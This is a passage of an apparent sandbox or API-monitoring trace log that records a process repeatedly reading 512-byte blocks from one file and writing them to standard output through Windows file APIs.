lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.898] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: 
hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.899] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.899] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 
[0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.901] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.901] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, 
lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.902] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.902] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 
0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.904] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.904] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) 
returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.905] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.905] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.907] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.907] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.908] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.908] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 
